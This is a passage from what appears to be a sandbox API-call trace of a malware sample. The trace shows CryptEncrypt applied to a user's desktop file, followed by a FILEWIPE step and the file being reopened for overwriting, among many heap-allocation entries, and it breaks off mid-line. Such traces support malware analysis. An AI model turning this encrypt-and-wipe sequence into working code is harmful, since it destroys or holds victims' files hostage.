PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.266] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.266] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.267] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x110a7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x110b0) returned 1 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0076.268] CharLowerBuffW (in: lpsz="byte[69809]", cchLength=0xb | out: lpsz="byte[69809]") returned 0xb [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.268] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.270] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0076.270] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0076.270] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.270] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.270] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c9208*, pdwDataLen=0x61e2d8*=0x110a7, dwBufLen=0x110b0 | out: pbData=0x7c9208*, pdwDataLen=0x61e2d8*=0x110b0) returned 1 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0076.271] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0076.272] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.285] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.285] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.288] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.288] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.288] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.288] CryptReleaseContext (hProv=0x696a48, dwFlags=0x0) returned 1 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad60 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.289] FreeLibrary (hLibModule=0x77710000) returned 1 [0076.290] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0076.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xdee48600, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0x6b8b38 [0076.294] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.294] CharLowerBuffW (in: lpsz="byte[69799]", cchLength=0xb | out: lpsz="byte[69799]") returned 0xb [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.295] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0076.295] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0076.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.295] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb388 [0076.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb388, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0076.296] FreeLibrary (hLibModule=0x76f90000) returned 1 [0076.296] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0076.296] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.296] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6f0 [0076.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ibbdx1qsrydlz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.298] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.299] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.299] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.300] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.300] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.300] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.301] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.302] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.302] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.302] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.302] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.302] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0076.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.304] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.304] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.305] HeapFree (in: hHeap=0x650000, 